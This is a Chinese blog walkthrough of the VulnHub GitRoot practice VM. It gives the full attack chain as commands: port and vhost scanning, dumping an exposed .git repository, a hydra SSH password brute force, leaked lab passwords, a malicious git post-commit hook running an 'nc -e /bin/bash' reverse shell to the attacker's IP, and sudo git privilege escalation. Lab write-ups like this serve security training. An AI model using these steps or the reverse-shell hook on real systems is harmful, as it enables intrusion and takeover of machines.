<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之GitRoot的實踐

    一顆小胡椒2023-05-08 11:12:17

    今天實踐的是vulnhub的GitRoot鏡像,

    下載地址,https://download.vulnhub.com/gitroot/GitRoot.ova,

    用virtualbox導入,直接從console上看到了地址,192.168.0.195,

    繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.195,

    有web服務,瀏覽器訪問http://192.168.0.195,

    提示了域名,wp.gitroot.vuln,把gitroot.vuln加入/etc/hosts,

    進行其它子域名的發現,獲取到子域名repo.gitroot.vuln,

    gobuster vhost --append-domain -u gitroot.vuln -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep "Status: 200",

    把repo.gitroot.vuln加入/etc/hosts,

    進行目錄掃描,dirb http://repo.gitroot.vuln,

    發現http://repo.gitroot.vuln/.git/,

    kali攻擊機上下載gitdumper,

    git clone https://github.com/arthaud/git-dumper.git,

    cd git-dumper,mkdir backup,

    把信息dump到本地,

    ./git_dumper.py http://repo.gitroot.vuln/.git/ backup,

    查看,cd backup,git log,獲取到用戶名pablo,

    破解密碼,hydra -l pablo -P /usr/share/wordlists/rockyou.txt 192.168.0.195 ssh,獲取到密碼mastergitar,

    ssh登錄,ssh pablo@192.168.0.195,不是root,發現三個賬戶,

    進入目錄,cd /opt/auth/.git/logs/refs/heads,

    找到了beth的密碼r3vpdmspqdb,

    切到beth,su beth,

    進入臨時可寫目錄,cd /tmp,

    創建目錄,mkdir -p .git/hooks,cd .git/hooks,

    創建文件,vim post-commit,

    nc 192.168.0.197 4444 -e /bin/bash

    給權限,chmod 777 post-commit,

    回到tmp目錄,cd /tmp,壓縮文件,7z a shell.zip .git/,

    kali攻擊機那邊用nc開個反彈shell監聽,nc -nlvp 4444,

    cp shell.zip /home/jen/public/repos/,

    kali攻擊機拿到反彈shell,

    轉成交互式,python3 -c "import pty;pty.spawn('/bin/bash')",

    進入home目錄,cd /home/jen,查看ls -la,

    從文件中獲取到密碼,cat .viminfo,binzpbeocnexoe,

    sudo -l查看root權限程序,是git,

    GTFOBins搜到提權方法,

    提權,sudo git -p help config,!/bin/sh,id確認是root,

    rootrepo
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    網絡拓撲場景介紹局域網下含有物理機、proxy server主機。物理機即普通客戶主機,proxy server即企業提供的代理,此網絡模擬的是公網環境。
    創建本地yum倉庫
    2023-04-24 14:41:49
    本文分享自天翼云開發者社區《創建本地yum倉庫》,作者: zzzzgj; 背景有的部署環境不通外網,但希望繼續使用yum命令下載依賴包而不修改部署腳本邏輯。因此記錄一個本地repo的建立方法。CentOS wiki提供了一個如何做到這一點。
    據悉,惡意軟件BotenaGo已部署了30多種功能,使數百萬物聯網設備面臨潛在網絡攻擊的風險。 近日,網絡安全公司Nozomi Networks Labs發現了專門針對Lilin安全攝像頭DVR設備惡意軟件BotenaGo的新變種,并將其命名為“Lillin掃描儀”,開發人員在源代碼中使用了它的名稱:/root/lillin.go。它是迄今為止最隱秘的變種,任何反病毒引擎都無法檢測到它的運行。
    據悉,惡意軟件BotenaGo已部署了30多種功能,使數百萬物聯網設備面臨潛在網絡攻擊的風險。 近日,網絡安全公司Nozomi Networks Labs發現了專門針對Lilin安全攝像頭DVR設備惡意軟件BotenaGo的新變種,并將其命名為“Lillin掃描儀”,開發人員在源代碼中使用了它的名稱:/root/lillin.go。它是迄今為止最隱秘的變種,任何反病毒引擎都無法檢測到它的運行
    iPhone制造商表示,它通過額外的驗證來解決這個問題。在2023年1月23日發貨的iOS 16.3、iPadOS 16.3和macOS Ventura 13.2中,這些中度至高度的漏洞已經得到修補。Austin Emmitt表示:上述漏洞代表了對macOS和iOS安全模型的重大破壞,該模型依賴于單個應用程序對所需資源的子集進行細粒度訪問,并查詢更高特權的服務以獲取其他任何內容。
    GitLab的安裝和使用
    2022-05-08 07:13:44
    近期目標是整明白用GitLab玩兒CI/CD,本周先從安裝和使用開始, 安裝非常簡單,ubuntu20.04, curl -s https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh | sudo bash, sudo apt install gitlab-ce,
    PersistenceIsFutile,8個后門。雖然說用腳本跑下就基本全出來了,但我還是想要個矜持的
    記一道有趣的VMware PWN
    2021-09-10 18:30:20
    題目亮點在于無需泄露libc地址,操控程序內部計算即可進行精準覆蓋。
    vulnhub之GitRoot的實踐
    2023-05-08 11:12:17
    /bin/sh,id確認是root
    靶機Agile補充圖片
    2023-03-22 10:04:15
    Nmap done: 1 IP address scanned in 171.68 seconds. 添加host└─# echo "10.10.11.203 superpass.htb" >> /etc/hosts. 注冊個賬號就讀取了。我們可以在 python 中創建一個腳本,自動實現這個過程,只需要輸入的文件路徑└─# cat lfi.py. data = {"username": "123", "password": "123", "submit": ""}
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类